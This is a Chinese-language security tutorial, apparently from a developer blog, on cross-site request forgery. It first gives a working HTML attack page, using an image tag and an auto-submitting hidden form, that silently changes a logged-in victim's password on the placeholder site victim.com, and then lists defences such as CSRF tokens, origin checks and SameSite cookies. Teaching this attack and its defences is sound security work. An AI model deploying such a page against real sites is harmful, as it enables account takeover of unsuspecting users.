网络安全:发起一次CSRF攻击!

一、如何发起一次CSRF攻击

1、目标网站信息:

复制代码
接口地址:https://victim.com/change-password
请求类型:get/post
接受参数:password

2、编写一个网页

html 复制代码
<!DOCTYPE html>
<html>
	<body>
		<!-- GET类型的CSRF -->
		<img src="https://victim.com/change-password?password=vme50">
		<!-- POST类型的CSRF -->
		 <form action="https://victim.com/change-password" method=POST>
		    <input type="hidden" name="password" value="vme50" />
		</form>
		<script> document.forms[0].submit(); </script> 
	</body>
</html>

3、诱导用户打开我们的网页

用户在已经登录了https://victim.com这个网站的情况下打开我们的网站,代码会自动发起网络请求,将受害者的账号密码修改为我们设置的值

二、防护策略

1、使用 CSRF Token(推荐):

在每个表单提交或敏感操作中包含一个随机生成的 CSRF Token,并将其与用户的会话关联起来。

服务器在接收到请求时验证 CSRF Token 的有效性,如果不匹配,则拒绝请求。

这样可以防止攻击者伪造请求,因为攻击者无法获取有效的 CSRF Token。

2、同源检测:

① 验证请求头:在服务器端验证请求头中的 Referer 字段或 Origin 字段,确保请求来自合法的源

② 验证域名:在服务器端对请求进行同源检测,只接受来自同一域名下的请求

③ 对在本域发起的攻击无效

将敏感的 Cookie 设置为 SameSite 属性为 Strict 或 Lax,限制其在跨站点请求中的发送,从而减少 CSRF 攻击的风险。

4、二次确认

① 验证码:对于敏感操作,可以要求用户输入验证码进行验证,以确保请求是由真实用户发起的

相关推荐
Bruce_Liuxiaowei1 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
星幻元宇VR1 小时前
公共安全主题展厅设备【防洪防汛安全科普系统】
科技·学习·安全
红糖奶茶3 小时前
【实测有效】 如何关闭Windows自动更新?【图文详解】win10/win11关闭自动更新
其他·安全
A-刘晨阳3 小时前
关键基础设施安全底座:自主可控时序大模型TimechoAI的国产化实践与深度时序分析能力
大数据·数据库·安全·时序数据库
E_ICEBLUE8 小时前
在 Python 中快速锁定 Excel 单元格与行列
python·安全·excel
米小虾20 小时前
AI Agent 安全实战指南:当智能体开始"不听话",开发者该如何应对?
人工智能·安全·agent
tntxia1 天前
网络安全漏洞修复(一)
安全
泯泷3 天前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷3 天前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt7 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js